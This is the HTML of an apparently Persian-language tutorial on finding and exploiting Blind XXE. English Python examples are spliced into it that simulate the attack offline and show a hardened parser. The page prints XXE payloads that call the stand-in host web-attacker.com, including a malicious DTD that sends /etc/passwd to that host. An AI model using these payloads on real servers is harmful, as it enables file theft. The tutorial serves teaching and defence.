elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"7e4a29e\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b5f1dba\" data-id=\"b5f1dba\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c2f1d01 elementor-widget elementor-widget-text-editor\" data-id=\"c2f1d01\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"whats-blind-xxe\">What is a Blind XXE vulnerability?<\/h3>\nA Blind XXE vulnerability arises when the application is vulnerable to XXE injection but does not return the value of any defined external entity in its responses. 
This means server-side files cannot be retrieved directly, which is why exploiting Blind XXE is generally harder than exploiting ordinary XXE.\nTo find and exploit a Blind XXE vulnerability, there are two general approaches:\n<ul>\n \t<li><span style=\"font-size: 10pt;\"><strong>You can trigger out-of-band network interactions. 
Sometimes sensitive data can be exfiltrated inside that interaction.<\/strong><\/span><\/li>\n \t<li><span style=\"font-size: 10pt;\"><strong>You can trigger XML parsing errors whose error messages contain sensitive data.<\/strong><\/span><\/li>\n<\/ul>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-dc07c55 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"dc07c55\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2341927\" data-id=\"2341927\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-dbd0864 elementor-widget elementor-widget-text-editor\" data-id=\"dbd0864\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div 
class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"oast\"><span style=\"font-size: 12pt;\">\u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc Blind XXE \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc OAST (\u06cc\u0627 out-of-band)<\/span><\/h3>\n\u0645\u0639\u0645\u0648\u0644\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0627 \u0647\u0645\u0627\u0646 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0627\u062a XXE SSRF \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f\u060c \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc Blind XXE \u0631\u0627 \u0646\u06cc\u0632 \u0628\u06cc\u0627\u0628\u06cc\u062f\u061b \u062a\u0641\u0627\u0648\u062a \u062f\u0631 \u0627\u06cc\u0646 \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u062a\u0639\u0631\u06cc\u0641 \u0645\u0642\u062f\u0627\u0631 External Entity\u060c \u0627\u0632 URL \u0633\u06cc\u0633\u062a\u0645\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u062f \u06a9\u0647 \u062f\u0631 \u06a9\u0646\u062a\u0631\u0644 \u0634\u0645\u0627\u0633\u062a\u060c \u0648 \u0627\u06cc\u0646\u200c\u06af\u0648\u0646\u0647 \u0627\u0631\u062a\u0628\u0627\u0637\u0627\u062a out-of-band \u0631\u0627 \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u06cc\u062f. 
For example, you can define an external entity as follows:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-84b59b6 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"84b59b6\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-eaf6773\" data-id=\"eaf6773\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-e436031 elementor-widget elementor-widget-text-editor\" data-id=\"e436031\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code>&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM &quot;http:\/\/f2g9j7hhkax.web-attacker.com&quot;&gt; ]&gt;<\/code><\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-05422f4 elementor-section-boxed elementor-section-height-default 
elementor-section-height-default\" data-id=\"05422f4\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c8fdc14\" data-id=\"c8fdc14\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-811e1c9 elementor-widget elementor-widget-text-editor\" data-id=\"811e1c9\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u067e\u0633 \u0627\u0632 \u062a\u0639\u0631\u06cc\u0641 \u0627\u06cc\u0646 \u0627\u0646\u062a\u06cc\u062a\u06cc\u060c \u0628\u0627\u06cc\u062f \u062f\u0631 \u0645\u06cc\u0627\u0646 \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u0641\u0627\u06cc\u0644 XML \u0627\u0632 \u0622\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f. <br \/>\u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u200c\u06cc XXE \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u0633\u0631\u0648\u0631 \u06cc\u06a9 \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a HTTP \u0628\u06a9\u200c\u0627\u0646\u062f \u0628\u0647 URL \u062a\u0639\u06cc\u06cc\u0646\u200c\u0634\u062f\u0647 \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u062f. 
By monitoring for the DNS lookup and the HTTP request, the attacker can tell whether the XXE attack succeeded.<\/p><p>Sometimes the application validates its input, or the XML parser (XML processor) it uses has been hardened, so XXE attacks that use regular entities are blocked. In such cases, XML parameter entities can be used instead. 
A parameter entity is a special kind of XML entity that can only be referenced inside the DTD; it cannot be referenced from the document content outside it. For XXE testing you only need to know two things about this kind of entity. First, a parameter entity is declared by placing a percent sign (%) before its name:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-13db797 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"13db797\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-665f35d\" data-id=\"665f35d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element 
elementor-element-dc870d5 elementor-widget elementor-widget-text-editor\" data-id=\"dc870d5\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code>&lt;!ENTITY % myparameterentity &quot;my parameter entity value&quot; &gt;<\/code><\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9078cfb elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9078cfb\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f43b4fc\" data-id=\"f43b4fc\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3132a44 elementor-widget elementor-widget-text-editor\" data-id=\"3132a44\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Second, to reference a parameter entity, instead of the ampersand (&amp;) 
that is used for regular entities, you use the percent sign (%):<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-5736bb8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"5736bb8\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-521b3b8\" data-id=\"521b3b8\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-d807678 elementor-widget elementor-widget-text-editor\" data-id=\"d807678\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code>%myparameterentity;<\/code><\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-a4392fe elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"a4392fe\" 
data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2891cea\" data-id=\"2891cea\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-e30564d elementor-widget elementor-widget-text-editor\" data-id=\"e30564d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u062d\u0627\u0644 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0631\u0648\u0634 \u062a\u0634\u062e\u06cc\u0635 out-of-band \u0648 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u062a\u0633\u062a \u06a9\u0646\u06cc\u062f \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc Blind XXE \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f \u06cc\u0627 \u062e\u06cc\u0631:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4322c3a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4322c3a\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1cf5ea7\" data-id=\"1cf5ea7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap 
">
elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5dbb4a0 elementor-widget elementor-widget-text-editor\" data-id=\"5dbb4a0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\"><code>&lt;!DOCTYPE foo [ &lt;!ENTITY % xxe SYSTEM &quot;http:\/\/f2g9j7hhkax.web-attacker.com&quot;&gt; %xxe; ]&gt;<\/code><\/span><\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-11fc162 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"11fc162\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7507199\" data-id=\"7507199\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-78a0ee3 elementor-widget elementor-widget-text-editor\" data-id=\"78a0ee3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>This XXE payload declares a parameter entity named xxe 
and then references it inside the DTD. This causes a DNS lookup and an HTTP request to the attacker's domain, which indicates the attack succeeded.<\/p><h4 id=\"oast-file-retrieval\"><span style=\"font-size: 12pt;\">Exploiting Blind XXE to exfiltrate data out-of-band<\/span><\/h4><p>We now know how to detect a blind XXE vulnerability using out-of-band techniques, but detection alone does not tell us how the vulnerability can be exploited. 
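The detection procedure described above (declare an external entity that points at a host you control, reference it, then watch for the DNS lookup and HTTP request) can be reproduced offline against Python's expat parser. The following is an added example, not code from the original article: it feeds both probe payloads from this section to a parser configured to resolve external entities, records every URL the parser tries to fetch instead of letting the request leave the machine (that list stands in for the attacker's OAST listener log), and then shows a hardened configuration that refuses the same input. The stockCheck/productId document and the behaviour of the on_external_entity handler are assumptions made for the example; the collaborator hostname is the article's own placeholder.

```python
"""Blind XXE out-of-band probe against Python's expat parser: added example,
not code from the original article. The parser's ExternalEntityRefHandler
records every URL it would fetch instead of fetching it; that list plays the
role of the attacker's OAST listener log."""
import xml.parsers.expat as expat

# Constructed payloads with the same shape as the article's probes. The host is
# the article's placeholder, not a live collaborator domain, and the
# <stockCheck> document is an assumed example of the application's input.
OAST_HOST = "http://f2g9j7hhkax.web-attacker.com"
GENERAL_ENTITY_PAYLOAD = (
    '<?xml version="1.0"?>'
    f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{OAST_HOST}"> ]>'
    "<stockCheck><productId>&xxe;</productId></stockCheck>"
)
PARAMETER_ENTITY_PAYLOAD = (
    '<?xml version="1.0"?>'
    f'<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "{OAST_HOST}"> %xxe; ]>'
    "<stockCheck><productId>381</productId></stockCheck>"
)


def vulnerable_parse(xml_text):
    """Parse with external entity resolution switched on.

    Returns (character_data, fetched_urls). On a real server every entry in
    fetched_urls would be a DNS lookup followed by an HTTP request to the
    attacker, which is exactly the signal a blind probe relies on.
    """
    fetched = []
    text = []
    parser = expat.ParserCreate()
    # Also resolve parameter entities such as %xxe; inside the DTD.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def on_external_entity(context, base, system_id, public_id):
        # A vulnerable application would open system_id here (http://, file://, ...).
        # We only log it; returning 1 tells expat the entity was handled and leaves
        # its replacement text empty, so nothing is reflected in the output.
        fetched.append(system_id)
        return 1

    parser.ExternalEntityRefHandler = on_external_entity
    parser.CharacterDataHandler = text.append
    parser.Parse(xml_text.encode("utf-8"), True)
    return "".join(text), fetched


def hardened_parse(xml_text):
    """Refuse any document that carries a DOCTYPE, and never install an
    ExternalEntityRefHandler, so expat has no way to resolve external entities
    (a fresh expat parser has none) even if a DTD slipped through."""
    text = []
    parser = expat.ParserCreate()

    def on_doctype(doctype_name, system_id, public_id, has_internal_subset):
        raise ValueError("DOCTYPE declarations are not accepted in this input")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.CharacterDataHandler = text.append
    parser.Parse(xml_text.encode("utf-8"), True)
    return "".join(text)


if __name__ == "__main__":
    for label, payload in (("general entity", GENERAL_ENTITY_PAYLOAD),
                           ("parameter entity", PARAMETER_ENTITY_PAYLOAD)):
        _, hits = vulnerable_parse(payload)
        print(f"{label}: vulnerable parser would request {hits}")
        try:
            hardened_parse(payload)
        except ValueError as err:
            print(f"{label}: hardened parser rejected it ({err})")
```

Both payloads produce a hit in the vulnerable configuration while the parsed content stays empty or unchanged, which is the blind case: the victim's response tells you nothing, only the callback does. Rejecting the DOCTYPE outright is the simplest defence because it removes the only place an entity can be declared; leaving the external entity handler unset is the second layer in case the first check is bypassed.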
The attacker's real goal is to exfiltrate sensitive data, not merely to find the vulnerability. Blind XXE can be used for that, but the attacker must host a malicious DTD on a system under their control and then invoke that DTD from within the XXE payload.<br \/>An example of a malicious DTD that can be used to exfiltrate the contents of the \/etc\/passwd file is the following:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section 
elementor-top-section elementor-element elementor-element-e505bc9 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e505bc9\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5b3aa63\" data-id=\"5b3aa63\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-590fb5c elementor-widget elementor-widget-text-editor\" data-id=\"590fb5c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code>&lt;!ENTITY % file SYSTEM &quot;file:\/\/\/etc\/passwd&quot;&gt;<br \/>&lt;!ENTITY % eval &quot;&lt;!ENTITY &amp;#x25; exfiltrate SYSTEM 'http:\/\/web-attacker.com\/?x=%file;'&gt;&quot;&gt;<br \/>%eval;<br \/>%exfiltrate;<\/code><\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-54fcc2e elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"54fcc2e\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container 
">
elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-515b163\" data-id=\"515b163\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6ad278d elementor-widget elementor-widget-text-editor\" data-id=\"6ad278d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>This DTD performs the following steps:<\/p><ul><li>It declares an XML parameter entity named file whose value is the contents of the \/etc\/passwd file.<\/li><li>It declares an XML parameter entity named eval that contains a dynamic declaration of another parameter entity named exfiltrate (the character reference &amp;#x25; stands for the % sign; because this metacharacter sits inside a string literal 
it cannot be typed directly: a literal % would be treated as the start of a parameter entity reference while the eval declaration itself is being parsed, so the character reference is used and the % only takes effect once eval is expanded). When the exfiltrate entity is referenced, an HTTP request is made to the attacker's web server. That request carries the value of the file entity directly in the URL query string; in other words, the contents of \/etc\/passwd, captured as the value of the file entity, are sent to the attacker's server inside the URL of the HTTP request.<\/li><li>It references the eval entity, which causes 
the exfiltrate entity to be declared dynamically.<\/li><li>It references the exfiltrate entity; when its value is substituted, the specified URL is requested over HTTP.<\/li><\/ul><p>Note that the file contents are pasted verbatim into a URL. A file containing newlines or other characters that are not allowed in a URL (and \/etc\/passwd is a multi-line file) can make the parser reject the URL and send nothing, so in practice it is common to test with a single-line file such as \/etc\/hostname first.<\/p><p>The attacker must then host this malicious DTD on a system under their control. Usually this means uploading the file to a web server they own. 
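To make the four steps above concrete without touching the network, here is an added example (not code from the original article) that models, in plain Python, how a DTD-aware parser processes those declarations: it records parameter entity declarations, expands %name; and &#x25; references in the order a parser would, and replaces the parser's file and network access with two constructed tables (the DTD the attacker serves and the files on the victim) plus a list of the URLs the victim's parser would have requested. The file contents, the rule that a URL containing whitespace is rejected, and the hosted-file table are assumptions of the model; the hostname and DTD text come from the article. It is not a real XML parser and handles only the constructs this attack uses.

```python
"""Model of parameter-entity expansion for the exfiltration DTD: added
example, not code from the original article, and not a real XML parser. It
supports only the constructs the attack uses: parameter entity declarations
(SYSTEM or literal), %name; references, and character references inside
literals. Disk and network access are replaced with constructed tables."""
import re
from urllib.parse import urlsplit

ATTACKER = "http://web-attacker.com"          # host used in the article's DTD
DTD_URL = f"{ATTACKER}/malicious.dtd"

# Constructed victim filesystem: one single-line file and one multi-line file.
TARGET_FS = {
    "/etc/hostname": "vuln-app-01",
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n",
}


def malicious_dtd(target_path):
    """The article's DTD with the stolen file made a parameter."""
    return (
        f'<!ENTITY % file SYSTEM "file://{target_path}">\n'
        '<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM '
        f"'{ATTACKER}/?x=%file;'>\">\n"
        "%eval;\n"
        "%exfiltrate;\n"
    )


DECL = re.compile(
    r"<!ENTITY\s+%\s+(?P<name>\w+)\s+"
    r"(?:SYSTEM\s+(?P<q1>[\"'])(?P<uri>.*?)(?P=q1)"
    r"|(?P<q2>[\"'])(?P<lit>.*?)(?P=q2))\s*>",
    re.DOTALL,
)
PE_REF = re.compile(r"%(?P<name>\w+);")
CHAR_REF = re.compile(r"&#x(?P<hex>[0-9A-Fa-f]+);|&#(?P<dec>[0-9]+);")


class ParameterEntityModel:
    def __init__(self, hosted):
        self.hosted = hosted      # attacker URL -> DTD text the attacker serves
        self.entities = {}        # name -> ("SYSTEM", uri) or ("LITERAL", text)
        self.requests = []        # every URL the victim's parser reached out to

    def fetch(self, uri):
        """Resolve a SYSTEM identifier the way the victim's parser would."""
        parts = urlsplit(uri)
        if parts.scheme == "file":
            return TARGET_FS[parts.path]
        # Modelling assumption: like common HTTP client libraries, reject a URL
        # containing whitespace. This is why a multi-line file pasted into the
        # query string often fails to exfiltrate.
        if any(ch.isspace() for ch in uri):
            raise ValueError(f"malformed URL, no request sent: {uri!r}")
        self.requests.append(uri)                 # the hit the attacker sees
        return self.hosted.get(uri, "")           # body, if the attacker serves one

    def value_of(self, name):
        kind, payload = self.entities[name]
        return self.fetch(payload) if kind == "SYSTEM" else payload

    def expand_literal(self, text):
        """Inside an entity value, %name; is replaced when the declaration is
        parsed, and a character reference such as &#x25; becomes the character
        itself; that is how a % is smuggled into eval without firing early."""
        text = PE_REF.sub(lambda m: self.value_of(m.group("name")), text)
        return CHAR_REF.sub(
            lambda m: chr(int(m.group("hex"), 16)) if m.group("hex")
            else chr(int(m.group("dec"))),
            text,
        )

    def process(self, dtd_text):
        """Walk declarations and references in order, as a parser would."""
        pos = 0
        while pos < len(dtd_text):
            if dtd_text[pos].isspace():
                pos += 1
                continue
            m = DECL.match(dtd_text, pos)
            if m is not None:
                if m.group("uri") is not None:
                    self.entities[m.group("name")] = ("SYSTEM", m.group("uri"))
                else:
                    self.entities[m.group("name")] = (
                        "LITERAL", self.expand_literal(m.group("lit")))
            else:
                m = PE_REF.match(dtd_text, pos)
                if m is None:
                    raise ValueError(f"unsupported DTD construct: {dtd_text[pos:pos + 40]!r}")
                # A reference between declarations splices the entity's text in as
                # more DTD; for a SYSTEM entity this is the out-of-band fetch.
                self.process(self.value_of(m.group("name")))
            pos = m.end()
        return self


def run_attack(target_path):
    """Host the DTD, submit the article's payload, and return the URLs the
    victim's parser would have requested (the attacker's web server log)."""
    model = ParameterEntityModel({DTD_URL: malicious_dtd(target_path)})
    model.process(f'<!ENTITY % xxe SYSTEM "{DTD_URL}"> %xxe;')
    return model.requests


if __name__ == "__main__":
    print(run_attack("/etc/hostname"))
    try:
        run_attack("/etc/passwd")
    except ValueError as err:
        print(err)
```

Running the model for /etc/hostname yields two requests in the attacker's log: first the fetch of malicious.dtd, then the exfiltration request with the hostname in the query string. Running it for the multi-line /etc/passwd stops at the last step because the constructed URL is malformed, which is the failure mode the caveat above refers to; real parsers differ in how strictly they validate the URL, so the assumption is a model of the common case, not a guarantee.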
\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644 \u0645\u0647\u0627\u062c\u0645 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0641\u0627\u06cc\u0644 DTD \u0645\u062e\u0631\u0628 \u0631\u0627 \u062f\u0631 \u0627\u06cc\u0646 URL \u0642\u0631\u0627\u0631 \u062f\u0647\u062f:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-6752094 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"6752094\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e4b5125\" data-id=\"e4b5125\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3da4e17 elementor-widget elementor-widget-text-editor\" data-id=\"3da4e17\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\">http:\/\/web-attacker.com\/malicious.dtd<\/span><\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-13f46db elementor-section-boxed elementor-section-height-default elementor-section-height-default\" 